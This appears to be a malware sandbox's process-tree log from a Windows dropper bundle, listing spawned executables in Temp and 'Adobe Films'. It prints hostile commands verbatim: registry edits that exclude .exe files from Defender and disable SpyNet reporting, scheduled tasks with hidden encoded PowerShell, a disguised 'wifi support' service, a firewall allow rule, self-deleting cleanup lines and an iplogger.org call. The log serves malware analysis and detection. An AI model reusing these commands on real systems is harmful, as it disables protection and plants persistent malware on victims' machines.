C:\Users\Admin\AppData\Local\Temp\H7MD2.exe
8⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\H7MD2.exe
C:\Users\Admin\AppData\Local\Temp\H7MD2.exe
8⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\C00FE.exe
"C:\Users\Admin\AppData\Local\Temp\C00FE.exe"
7⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\C00FE.exe
"C:\Users\Admin\AppData\Local\Temp\C00FE.exe"
7⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\D18GK.exe
"C:\Users\Admin\AppData\Local\Temp\D18GK.exe"
7⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\8I9H2.exe
"C:\Users\Admin\AppData\Local\Temp\8I9H2.exe"
7⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\8I9H2.exe
"C:\Users\Admin\AppData\Local\Temp\8I9H2.exe"
7⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\AIHBFC3H9681BGJ.exe
https://iplogger.org/1OAvJ
7⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:2592

C:\Users\Admin\AppData\Local\Temp\bb7bb219-07ff-4521-ae61-018c91d179c3.exe
"C:\Users\Admin\AppData\Local\Temp\bb7bb219-07ff-4521-ae61-018c91d179c3.exe"
7⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\xuemeili.exe
"C:\Users\Admin\AppData\Local\Temp\xuemeili.exe"
6⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\xuemeili.exe
"C:\Users\Admin\AppData\Local\Temp\xuemeili.exe" -h
7⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
6⤵
PID:5372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mmjyhl0f.yvq.bat""
7⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
6⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\is-5DA8S.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5DA8S.tmp\setup.tmp" /SL5="$90122,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:780

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3448

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3016

C:\Users\Admin\Pictures\Adobe Films\rTrECCRopMbKTIfmDNAC6NA3.exe
"C:\Users\Admin\Pictures\Adobe Films\rTrECCRopMbKTIfmDNAC6NA3.exe"
3⤵
PID:1716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 624
4⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 676
4⤵
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 728
4⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 896
4⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 1236
4⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "rTrECCRopMbKTIfmDNAC6NA3.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\rTrECCRopMbKTIfmDNAC6NA3.exe" & exit
4⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 1460
4⤵
PID:5312

C:\Users\Admin\Pictures\Adobe Films\38su9NWB53pNMVdfoYnIg0Tl.exe
"C:\Users\Admin\Pictures\Adobe Films\38su9NWB53pNMVdfoYnIg0Tl.exe"
3⤵
PID:1928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 38su9NWB53pNMVdfoYnIg0Tl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\38su9NWB53pNMVdfoYnIg0Tl.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:1868

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 38su9NWB53pNMVdfoYnIg0Tl.exe /f
5⤵
- Kills process with taskkill
PID:1972

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:1604

C:\Users\Admin\Pictures\Adobe Films\tciaZAlp4hTWqrPU5MOfraXj.exe
"C:\Users\Admin\Pictures\Adobe Films\tciaZAlp4hTWqrPU5MOfraXj.exe"
3⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 460
4⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 456
4⤵
PID:864

C:\Users\Admin\Pictures\Adobe Films\zurkvUBVvfKAfqSAhvzKp7Xe.exe
"C:\Users\Admin\Pictures\Adobe Films\zurkvUBVvfKAfqSAhvzKp7Xe.exe"
3⤵
PID:3024

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:532

C:\Users\Admin\Pictures\Adobe Films\wwmFmtgN17iMh5A7PXI2jDxx.exe
"C:\Users\Admin\Pictures\Adobe Films\wwmFmtgN17iMh5A7PXI2jDxx.exe"
3⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\8575e9a2-7840-4194-9fe0-054351a2d68d.exe
"C:\Users\Admin\AppData\Local\Temp\8575e9a2-7840-4194-9fe0-054351a2d68d.exe"
4⤵
PID:4744

C:\Users\Admin\Pictures\Adobe Films\lU4Kq1vdOg_QYBmq9rI3WU4v.exe
"C:\Users\Admin\Pictures\Adobe Films\lU4Kq1vdOg_QYBmq9rI3WU4v.exe"
3⤵
PID:4232

C:\Users\Admin\Pictures\Adobe Films\YmPmheUHY9HiWGe0qNIqjoNE.exe
"C:\Users\Admin\Pictures\Adobe Films\YmPmheUHY9HiWGe0qNIqjoNE.exe"
3⤵
PID:540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sayrdmum\
4⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ddkpvoxu.exe" C:\Windows\SysWOW64\sayrdmum\
4⤵
PID:4796

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create sayrdmum binPath= "C:\Windows\SysWOW64\sayrdmum\ddkpvoxu.exe /d\"C:\Users\Admin\Pictures\Adobe Films\YmPmheUHY9HiWGe0qNIqjoNE.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:3440

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description sayrdmum "wifi internet conection"
4⤵
PID:3152

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start sayrdmum
4⤵
PID:1836

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 1052
4⤵
PID:2296

C:\Users\Admin\Pictures\Adobe Films\p_ixFFf3AuOogK6LvMturhn9.exe
"C:\Users\Admin\Pictures\Adobe Films\p_ixFFf3AuOogK6LvMturhn9.exe"
3⤵
PID:4576

C:\Users\Admin\Pictures\Adobe Films\roMz6y6HlD2rLjjit_XqjuHx.exe
"C:\Users\Admin\Pictures\Adobe Films\roMz6y6HlD2rLjjit_XqjuHx.exe"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:1088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5056

C:\Users\Admin\Pictures\Adobe Films\S2v_baazXhcMa1TVfPv1vzLN.exe
"C:\Users\Admin\Pictures\Adobe Films\S2v_baazXhcMa1TVfPv1vzLN.exe"
3⤵
PID:1624

C:\Users\Admin\Pictures\Adobe Films\6StkzVUxZScvrtSk3ie9yl_d.exe
"C:\Users\Admin\Pictures\Adobe Films\6StkzVUxZScvrtSk3ie9yl_d.exe"
3⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
PID:2400

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:3816

C:\Users\Admin\Pictures\Adobe Films\TtXfxYRYgPWjKmazaLsxRFBg.exe
"C:\Users\Admin\Pictures\Adobe Films\TtXfxYRYgPWjKmazaLsxRFBg.exe"
3⤵
PID:2604

C:\Users\Admin\Pictures\Adobe Films\AqrO0_5jXPkKX0p5kL5VQ1HX.exe
"C:\Users\Admin\Pictures\Adobe Films\AqrO0_5jXPkKX0p5kL5VQ1HX.exe"
3⤵
PID:5048

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 552
4⤵
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 868
4⤵
PID:1840

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1004
4⤵
PID:5248

C:\Users\Admin\Pictures\Adobe Films\uDBlCWK9ITUKMGqvDEPwkgmM.exe
"C:\Users\Admin\Pictures\Adobe Films\uDBlCWK9ITUKMGqvDEPwkgmM.exe"
3⤵
PID:4768

C:\Users\Admin\Pictures\Adobe Films\MxUx4xzErmyS3fAnBm9Ka_oN.exe
"C:\Users\Admin\Pictures\Adobe Films\MxUx4xzErmyS3fAnBm9Ka_oN.exe"
3⤵
PID:2132

C:\Users\Admin\Pictures\Adobe Films\77WTdNbyUCpZYQXpZH3g66Mz.exe
"C:\Users\Admin\Pictures\Adobe Films\77WTdNbyUCpZYQXpZH3g66Mz.exe"
3⤵
PID:2720

C:\Users\Admin\Pictures\Adobe Films\UhxDtBWts2RLJjpKyvqsWAtU.exe
"C:\Users\Admin\Pictures\Adobe Films\UhxDtBWts2RLJjpKyvqsWAtU.exe"
3⤵
PID:4236

C:\Users\Admin\Pictures\Adobe Films\CvMBCof5fkD8eV6or7RsKz2j.exe
"C:\Users\Admin\Pictures\Adobe Films\CvMBCof5fkD8eV6or7RsKz2j.exe"
3⤵
PID:4404

C:\Users\Admin\Pictures\Adobe Films\1jE45mgHDE_I6VCt5GX0uhCY.exe
"C:\Users\Admin\Pictures\Adobe Films\1jE45mgHDE_I6VCt5GX0uhCY.exe"
3⤵
PID:2296

C:\Users\Admin\Pictures\Adobe Films\d7U7v3oZo7A8U3aL0HGhs_c6.exe
"C:\Users\Admin\Pictures\Adobe Films\d7U7v3oZo7A8U3aL0HGhs_c6.exe"
3⤵
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 408 -ip 408
1⤵
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 408 -ip 408
1⤵
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 408 -ip 408
1⤵
PID:3464

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 604
3⤵
- Program crash
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5012 -ip 5012
1⤵
PID:908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 408 -ip 408
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 408 -ip 408
1⤵
PID:2068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 408 -ip 408
1⤵
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 408 -ip 408
1⤵
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 408 -ip 408
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 408 -ip 408
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 408 -ip 408
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 408 -ip 408
1⤵
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 408 -ip 408
1⤵
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 408 -ip 408
1⤵
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 408 -ip 408
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 408 -ip 408
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 408 -ip 408
1⤵
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 408 -ip 408
1⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 408 -ip 408
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 408 -ip 408
1⤵
PID:1052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 408 -ip 408
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 408 -ip 408
1⤵
PID:2092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2564 -ip 2564
1⤵
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2564 -ip 2564
1⤵
PID:1052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2564 -ip 2564
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2564 -ip 2564
1⤵
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2564 -ip 2564
1⤵
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2564 -ip 2564
1⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2564 -ip 2564
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2564 -ip 2564
1⤵
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2564 -ip 2564
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2564 -ip 2564
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2564 -ip 2564
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2564 -ip 2564
1⤵
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2564 -ip 2564
1⤵
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2564 -ip 2564
1⤵
PID:748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2564 -ip 2564
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2564 -ip 2564
1⤵
PID:908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1744 -ip 1744
1⤵
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1744 -ip 1744
1⤵
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1744 -ip 1744
1⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1744 -ip 1744
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1744 -ip 1744
1⤵
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1744 -ip 1744
1⤵
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1744 -ip 1744
1⤵
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1744 -ip 1744
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1744 -ip 1744
1⤵
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1744 -ip 1744
1⤵
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1744 -ip 1744
1⤵
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1744 -ip 1744
1⤵
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1744 -ip 1744
1⤵
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1744 -ip 1744
1⤵
PID:4768

C:\Users\Admin\AppData\Local\Temp\7zS4956.tmp\Install.exe
.\Install.exe
2⤵
PID:3464

C:\Users\Admin\AppData\Local\Temp\7zS6FD9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
PID:3400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
PID:1260

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:5552

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:5224

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
PID:4196

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:2376

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:5676

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNTHPdLAZ" /SC once /ST 07:38:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:4048

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNTHPdLAZ"
4⤵
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1744 -ip 1744
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1744 -ip 1744
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1744 -ip 1744
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1744 -ip 1744
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1744 -ip 1744
1⤵
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
1⤵
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1744 -ip 1744
1⤵
PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1744 -ip 1744
1⤵
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1744 -ip 1744
1⤵
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1744 -ip 1744
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 452
1⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1716 -ip 1716
1⤵
PID:4748

C:\Users\Admin\Pictures\Adobe Films\S2v_baazXhcMa1TVfPv1vzLN.exe
"C:\Users\Admin\Pictures\Adobe Films\S2v_baazXhcMa1TVfPv1vzLN.exe"
1⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4868 -ip 4868
1⤵
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2296 -ip 2296
1⤵
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4316 -ip 4316
1⤵
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4868 -ip 4868
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4316 -ip 4316
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2980 -ip 2980
1⤵
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2296 -ip 2296
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 468
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5048 -ip 5048
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4232 -ip 4232
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1716 -ip 1716
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1716 -ip 1716
1⤵
PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 540 -ip 540
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1716 -ip 1716
1⤵
PID:4400

C:\Users\Admin\AppData\Roaming\bscevfd
C:\Users\Admin\AppData\Roaming\bscevfd
1⤵
PID:4720

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
PID:2340

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask
1⤵
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1744 -ip 1744
1⤵
PID:4796

C:\Windows\SysWOW64\WerFault.exe
